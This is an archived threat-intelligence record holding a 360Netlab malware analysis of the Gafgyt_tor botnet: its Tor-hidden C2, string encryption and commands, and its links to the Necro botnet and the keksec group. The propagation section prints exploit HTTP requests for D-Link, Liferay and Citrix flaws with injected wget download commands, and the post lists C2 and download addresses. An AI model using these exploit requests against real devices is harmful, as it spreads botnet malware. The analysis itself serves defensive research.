{
	"id": "c10307fa-ff9f-4763-ae2f-d463efa2ca86",
	"created_at": "2026-04-06T00:09:51.590006Z",
	"updated_at": "2026-04-10T03:25:15.771778Z",
	"deleted_at": null,
	"sha1_hash": "44330d4c91bdb0409502e19e28be97f91d36b702",
	"title": "Gafgtyt_tor and Necro are on the move again",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 572660,
	"plain_text": "Gafgtyt_tor and Necro are on the move again\r\nBy jinye\r\nPublished: 2021-03-04 · Archived: 2026-04-02 12:47:04 UTC\r\nOverview\r\nSince February 15, 2021, 360Netlab's BotMon system has continuously detected a new variant of the Gafgyt\r\nfamily, which uses Tor for C2 communication to hide the real C2 and encrypts sensitive strings in the samples.\r\nThis is the first time we have found a Gafgyt variant using the Tor mechanism, so we named the variant Gafgyt_tor.\r\nFurther analysis revealed that the family is closely related to the Necro family we made public in January, and that\r\nthe same group of people, the so-called keksec group [1] [2], is behind both. In this blog, we will introduce Gafgyt_tor\r\nand summarize other recent botnets operated by this group.\r\nThe key points of this article are as follows.\r\n1. Gafgyt_tor uses Tor to hide C2 communication; more than 100 Tor proxies are built in, and new samples are\r\ncontinuously updating the proxy list.\r\n2. Gafgyt_tor shares the same origin as the Gafgyt samples distributed by the keksec group; the core\r\nfunction is still DDoS attacks and scanning.\r\n3. The keksec group reuses code between different bot families.\r\n4. In addition, the keksec group also reuses a set of IP addresses over a long period of time.\r\nSample Analysis\r\nPropagation\r\nThe currently discovered Gafgyt_tor botnet is mainly propagated through weak Telnet passwords and the\r\nfollowing three vulnerabilities.\r\nD-Link RCE (CVE-2019-16920)\r\nPOST /apply_sec.cgi HTTP/1.1\r\nHost: %s:%d\r\nUser-Agent: kpin\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\nConnection: close\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 1 of 17\n\nReferer: http://%s:%d/login_pic.asp\r\nCookie: uid=1234123\r\nUpgrade-Insecure-Requests: 1\r\nhtml_response_page=login_pic.asp\u0026action=ping_test\u0026ping_ipaddr=127.0.0.1%%0acd%%20%%2Ftmp;busybox%%20wget%%20http\r\nLiferay Portal RCE\r\nPOST /api/jsonws/expandocolumn/update-column HTTP/1.1\r\nHost: %s:%d\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.25.0\r\nContent-Length: %d\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic dGVzdEBsaWZlcmF5LmNvbTp0ZXN0\r\n%2BdefaultData=com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\u0026defaultData.userOverridesAsString=HexAsciiSer\r\nCitrix CVE-2019-19781\r\nPOST /vpns/portal/scripts/newbm.pl HTTP/1.1\r\nHost: %s:%d\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nNSC_USER: ../../../netscaler/portal/templates/flialwznxz\r\nNSC_NONCE: 12\r\nContent-Length: %d\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nurl=127.0.0.1\u0026title=%%5B%%25+template.new%%28%%7B%%27BLOCK%%27%%3D%%27print+readpipe%%28%%22cd+%%2Ftmp%%3Bwget+\r\nEncryption\r\nGafgyt_tor integrates a substitution encryption algorithm for encrypting the C2 and sensitive strings to counter\r\ndetection and static analysis. Sensitive strings include commands, IPC pathnames, DDoS-related attack strings,\r\netc.\r\nThe following is a comparison of the ciphertext and plaintext C2.\r\n# ciphertext\r\n'\"?\u003eK!tF\u003eiorZ:ww_uBw3Bw'\r\n# plaintext\r\n'wvp3te7pkfczmnnl.onion'\r\nAll of the Gafgyt_tor variants we have detected so far use the same C2, wvp3te7pkfczmnnl.onion.\r\nSome of the decryption results are as follows.\r\n# commands\r\n~-6mvgmv - LDSERVER\r\n1-| - UDP\r\ncD| - TCP\r\nej~- - HOLD\r\n51,U - JUNK\r\nc~6 - TLS\r\n6c- - STD\r\n-,6 - DNS\r\n6D7,,mv - SCANNER\r\nj, - ON\r\njdd - OFF\r\njge - OVH\r\n.~7DU,1v6m - BLACKNURSE\r\n# DDoS-related attack\r\n7~~ - ALL\r\n6p, - SYN\r\nv6c - RST\r\ndx, - FIN\r\n7DU - ACK\r\n|6e - PSH\r\n# Scan-related\r\naDbwwtr3bw - WChnnecihn\r\naQuq - W.1\r\naEcc - WxTT\r\n74tw! - Agent\r\n1;t= - User\r\n# misc\r\n|x,\u003c - PING\r\n=ru_Brf_ - rc.local\r\nThe following is the Python decryption code we wrote based on the reversing results.\r\ndef decode(encoded, encodes):\r\n    # Each ciphertext byte is looked up in the sample's 64-byte table (encodes)\r\n    # and replaced by the byte at the same index in the plaintext alphabet (decodes).\r\n    idx = 0\r\n    decodes = b'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. '\r\n    decoded = bytearray()\r\n    while (idx \u003c len(encoded)):\r\n        for table_idx in range(0, 64):\r\n            if encoded[idx] == encodes[table_idx]:\r\n                decoded.append(decodes[table_idx])\r\n        idx += 1\r\n    print(decoded)\r\n\r\n# substitution table recovered from the Gafgyt_tor sample\r\nencodes = b'%q*KC)\u0026F98fsr2to4b3yi_:wB\u003ez=;!k?\"EAZ7.D-md\u003cex5U~h,j|$v6c1ga+p@un'\r\n# encrypted C2 string taken from the sample; decodes to wvp3te7pkfczmnnl.onion\r\nencoded_cc = b'\"?\u003eK!tF\u003eiorZ:ww_uBw3Bw'\r\ndecode(encoded_cc, encodes)\r\nCommunication\r\nCompared with other Gafgyt variants, the biggest change in Gafgyt_tor is that the C2 communication is based on\r\nTor, which increases the difficulty of detection and blocking. The Tor-based C2 communication mechanism has\r\nbeen seen in other families we have analyzed before (Matryosh, leethozer, moobot), but this is the first time we have\r\nencountered it in the Gafgyt family.\r\nCode changes\r\nCompared with other versions, the code structure of the main function of Gafgyt_tor, which adds the Tor proxy\r\nfunction, has changed considerably, as shown in the following figure.\r\nThe original initConnection() function, which was responsible for establishing the C2 connection, is gone, replaced\r\nby a large section of code responsible for establishing the Tor connection. The newly added Tor-related functions\r\nare as follows.\r\nAmong them, tor_socket_init is responsible for initializing a list of proxy nodes, each containing an IP address and\r\na port.\r\nOur analysis shows that the number of proxy nodes integrated in each sample is always 100+, with a maximum of\r\n173.\r\nAfter initializing the proxy list, the sample selects a random node from the list to enable Tor communication\r\nvia tor_retrieve_addr and tor_retrieve_port.\r\nAfter establishing a connection with the Tor proxy, Gafgyt_tor starts requesting wvp3te7pkfczmnnl.onion through\r\nthe darknet and waits for instructions. This C2 address has not changed in the samples we have analyzed, but the\r\ncommunication port changes continuously.\r\nThe command\r\nThe core function of Gafgyt_tor is still DDoS attacks and scanning, so it mostly follows the common Gafgyt\r\ndirectives; a new directive called LDSERVER has been added. Through this directive the C2 can specify the download\r\nserver used in Gafgyt_tor's exploits, as shown in the figure below.\r\nThis directive means that the C2 can dynamically switch download servers, so that it can quickly move to a new\r\ndownload server and continue propagation if the current one is blocked.\r\nSome other things\r\nGafgyt_tor uses a few uncommon coding tricks in addition to the modification of the communication function.\r\nSingleton mode\r\nSingle-instance mode is implemented using Unix domain sockets (an IPC mechanism), which require a pathname\r\nto be specified; this pathname is also encrypted. As shown below, k4=f2t decrypts to ugrade.\r\nFunction name obfuscation\r\nNone of the Gafgyt_tor samples we collected have been stripped, so the complete symbol information is\r\npreserved in the samples, and most of the samples scan and propagate using a function named ak47Scan.\r\nIn the sample captured on February 24 we found that the function name had been obfuscated into a random string, so it\r\ncan be assumed that the sample is in an active development stage and the authors are gradually strengthening\r\nGafgyt_tor's ability to counter analysis and detection.\r\nSample origin\r\nWhile analyzing the IoCs of Gafgyt_tor, we noticed that the download server IP 45.145.185.83 was used by the Necro\r\nbotnet, which appeared in early January this year:\r\ngxbrowser.net is one of Necro's 3 C2s, and the above image shows that it has resolved to this Gafgyt_tor download\r\nserver IP several times.\r\nFurther analysis shows that this IP and another Necro C2 IP, 193.239.147.224, were also used as C2 by other\r\nversions of the Gafgyt and Tsunami botnets in early February, which apparently share code with Gafgyt_tor.\r\n1. Both have decryption functions named decode, with identical code structures.\r\n2. Both have scan functions named ak47scan and ak47telscan.\r\nTheir decode() functions differ only in the code table.\r\n# Code table in the gafgyt sample\r\n'%q*KC)\u0026F98fsr2to4b3yi_:wB\u003ez=;!k?\"EAZ7.D-md\u003cex5U~h,j|$v6c1ga+p@un0'\r\n# Code table in tsunami sample\r\n'xm@_;w,B-Z*j?nvE|sq1o$3\"7zKC\u003cF)utAr.p%=\u003e4ihgfe6cba~\u00265Dk2d!8+9Uy:0'\r\nThe following figure is a comparison of their ak47scan() functions; you can see that the function and structure are\r\nactually similar, but there are changes in the way it runs and the ports it scans.\r\nBased on the binary characteristics of the decode() and ak47scan() functions mentioned above, we found more\r\nsuch Tsunami and Gafgyt samples in our sample database, which are characterized as follows.\r\n1. Tsunami samples appeared in mid-August 2020 and were active for a short period of time.\r\n2. Gafgyt samples were spreading intermittently from September to December 2020.\r\n3. From early to mid-February, first Tsunami samples resumed propagation, then Gafgyt, followed by\r\nGafgyt_tor.\r\n4. There are many similarities between the currently spreading Gafgyt_tor variants and the previously\r\ncaptured Gafgyt samples, and the code is clearly of the same origin.\r\n5. These botnet variants frequently reuse the same download server and C2 IP.\r\nWe can see that there was no update in January this year; we guess this is because the authors focused their efforts on\r\nNecro. In terms of binary characteristics, there is no similarity with Gafgyt_tor, as Necro is written in Python, but\r\nwe see some commonalities in propagation methods.\r\n1. Both switched between different exploits in a short period of time, presumably to improve the propagation effect.\r\n2. Both adopted a \"develop-and-distribute\" approach to continuously improve the botnet functions, resulting\r\nin a large number of different samples being distributed in a short period of time.\r\nBased on the above analysis, we think that Gafgyt_tor and Necro are very likely operated by the same group of\r\npeople, who have a pool of IP addresses and multiple botnet source codes, and have the ability to develop\r\ncontinuously. In actual operation, they run different families of botnets but reuse infrastructure such as IP\r\naddresses; for example, the above-mentioned IP 45.145.185.83 has acted as C2 for different botnets\r\nsince the end of last year. The timeline of its different roles is roughly shown in the figure below.\r\nHere are some conclusions about the group:\r\n1. They have at least the source code for Necro, Gafgyt and Tsunami.\r\n2. They continue to upgrade and rotate the botnets in their hands.\r\n3. They have a pool of IP address resources and reuse them in different botnets.\r\n4. The group also keeps up with n-day vulnerabilities in IoT and uses them promptly to spread their own\r\nbotnets.\r\nThe timeline chart below shows the Linux IoT botnet families operated by this group that we detected from last\r\nAugust to now.\r\nReaders are always welcome to reach us on Twitter, or by email to netlab at 360 dot cn.\r\nIoC\r\nMD5\r\nC2\r\nwvp3te7pkfczmnnl.onion\r\nDownload URL\r\nTor Proxy\r\nReferences\r\nhttps://blog.netlab.360.com/necro/\r\nhttps://mp.weixin.qq.com/s/D30y0qeicKnHmP9Kad-pmg\r\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\r\nSource: https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/"
	],
	"report_names": [
		"gafgtyt_tor-and-necro-are-on-the-move-again"
	],
	"threat_actors": [
		{
			"id": "5a270f6c-2c13-4abf-861e-7d44dcfa5ceb",
			"created_at": "2023-11-03T02:00:07.794425Z",
			"updated_at": "2026-04-10T02:00:03.383096Z",
			"deleted_at": null,
			"main_name": "Keksec",
			"aliases": [],
			"source_name": "MISPGALAXY:Keksec",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434191,
	"ts_updated_at": 1775791515,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/44330d4c91bdb0409502e19e28be97f91d36b702.pdf",
		"text": "https://archive.orkl.eu/44330d4c91bdb0409502e19e28be97f91d36b702.txt",
		"img": "https://archive.orkl.eu/44330d4c91bdb0409502e19e28be97f91d36b702.jpg"
	}
}